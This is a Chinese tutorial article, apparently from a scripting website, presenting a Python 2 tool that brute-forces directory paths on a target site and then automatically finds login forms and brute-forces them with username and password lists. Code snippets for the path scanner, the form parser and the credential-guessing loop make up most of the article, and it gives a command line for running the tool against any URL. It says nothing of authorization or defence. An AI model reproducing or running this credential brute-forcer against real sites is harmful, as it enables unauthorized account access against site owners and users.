脚本之家 服务器常用软件
快捷导航
您的位置:首页脚本专栏python → python 破解表单

python遍历路径破解表单的示例

 更新时间:2020年11月21日 10:22:21   作者:Misaki''s  
这篇文章主要介绍了python遍历路径破解表单的示例,帮助大家更好的理解和使用python,感兴趣的朋友可以了解下

首先是利用python遍历路径,采用字典爆破的形式,当然如果只是单纯的爆破路径,简单写一个多线程脚本就行了。这里考虑如何对爆破到的路径进行第二步利用,此处尝试对猜解到的路径进行表单发现及登陆爆破处理。

​首先就是路径爆破,采用多线程队列,爆破路径,判断形式为200响应码。

    while not self._queue.empty():
      queue = self._queue.get(timeout=0.5)
      try:
        r = requests.get(self.url+queue,timeout=5, headers=self.headers)
        if r.status_code == 200:
          print "[200] %s" %(queue)
          soup = BeautifulSoup(r.content,'html.parser')
          if soup.find('form'):
            self.brute(soup, queue)

猜解到路径后交给brute方法处理,方法实现了一个css选择器,获取form表单中的input字段标签,提取标签参数组合成post参数值,然后提取表单中的action跳转页面,如没有页面默认在当前表单页提交。

input = soup.select("form input")
      for i in input:
        try:
          if i.attrs['type'] == "hidden":
            name, value = i.attrs['name'], i.attrs['value']
            list_post.append(name+'='+value)
          elif i.attrs['type'] == 'password':
            name = i.attrs['name']
            list_post.append(name+'=$$$')
          else:
            name = i.attrs['name']
            list_post.append(name+'=%%%')
        except:
          continue
      for i in list_post:
        post = post + i + '&'
      action = soup.find_all('form')
      for i in action:
        if i['action']:
          actiontag = i['action']
        else:
          actiontag = queue
      self.payload(post, actiontag)

获取参数值后,交给payload方法处理登陆,采用requests库的session登陆。获取cookie,先采用session请求获取cookie后,再采用session携带cookie进行请求提交。然后对输入的验证值进行判断是否为登陆成功。

    for name in self.username():
      post_user = post.replace('%%%',name.strip())
      for pwd in self.password():
        post_pwd = post_user.replace('$$$',pwd.strip())
        session = requests.Session()
        session.get(self.url+'/'+action, headers=self.headers, verify=False)
        r = session.post(self.url+'/'+action, data=post_pwd, headers=self.headers, verify=False)
        if self.word in r.content:
          print '[username] %s' %name +'\r' + '[password] %s' %pwd
          return

为了判断是否登陆成功,采用的人为输入判断字符串的形式。也就是脚本执行形式为

python xxx.py http://xxxx.com xxxxx

以上就是python遍历路径破解表单的示例的详细内容,更多关于python 破解表单的资料请关注脚本之家其它相关文章!

您可能感兴趣的文章:

相关文章

  • Python不改变Excel单元格样式方式—xls和xlsx两种格式

    Python不改变Excel单元格样式方式—xls和xlsx两种格式

    这篇文章主要介绍了Python不改变Excel单元格样式方式—xls和xlsx两种格式,具有很好的参考价值,希望对大家有所帮助。如有错误或未考虑完全的地方,望不吝赐教
    2023-06-06
  • 如何利用opencv判断两张图片是否相同详解

    如何利用opencv判断两张图片是否相同详解

    这篇文章主要给大家介绍了关于如何利用opencv判断两张图片是否相同的相关资料,OpenCV是一个开源的计算机视觉库,它提供了很多函数,这些函数非常高效地实现了计算机视觉算法,需要的朋友可以参考下
    2021-07-07
  • python用opencv将标注提取画框到对应的图像中

    python用opencv将标注提取画框到对应的图像中

    这篇文章主要介绍了python用opencv将标注提取画框到对应的图像中,文章围绕主题展开详细的内容介绍,具有一定的参考价值,需要的小伙伴可以参考一下
    2022-08-08
  • 基于Python+Flask实现一个简易网页验证码登录系统案例

    基于Python+Flask实现一个简易网页验证码登录系统案例

    当今的互联网世界中,为了防止恶意访问,许多网站在登录和注册表单中都采用了验证码技术,验证码可以防止机器人自动提交表单,确保提交行为背后有一个真实的人类用户,本文将向您展示如何使用Python的Flask框架来创建一个简单的验证码登录系统
    2023-09-09
  • Pytorch训练模型得到输出后计算F1-Score 和AUC的操作

    Pytorch训练模型得到输出后计算F1-Score 和AUC的操作

    这篇文章主要介绍了Pytorch训练模型得到输出后计算F1-Score 和AUC的操作,具有很好的参考价值,希望对大家有所帮助。如有错误或未考虑完全的地方,望不吝赐教
    2021-05-05
  • python利用pandas和csv包向一个csv文件写入或追加数据

    python利用pandas和csv包向一个csv文件写入或追加数据

    这篇文章主要给大家介绍了关于python利用pandas和csv包向一个csv文件写入或追加数据的相关资料,我们越来越多的使用pandas进行数据处理,有时需要向一个已经存在的csv文件写入数据,需要的朋友可以参考下
    2023-07-07
  • Python 实战开发校园管理系统详细流程

    Python 实战开发校园管理系统详细流程

    读万卷书不如行万里路,只学书上的理论是远远不够的,只有在实战中才能获得能力的提升,本篇文章手把手带你用Python开发一套校园管理系统,包含各种人员,如教师、学生等。学校的系统通常还包括一些课程的信息,大家可以在过程中查缺补漏,提升水平
    2021-10-10
  • python向已存在的excel中新增表,不覆盖原数据的实例

    python向已存在的excel中新增表,不覆盖原数据的实例

    下面小编就为大家分享一篇python向已存在的excel中新增表,不覆盖原数据的实例,具有很好超参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
    2018-05-05
  • python配置mssql连接的方法

    python配置mssql连接的方法

    这篇文章主要介绍了python配置mssql连接的方法,需要的朋友可以参考下
    2021-06-06
  • 关于Python3的import问题(pycharm可以运行命令行import错误)

    关于Python3的import问题(pycharm可以运行命令行import错误)

    这篇文章主要介绍了关于Python3的import问题(pycharm可以运行命令行import错误),文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2020-11-11

最新评论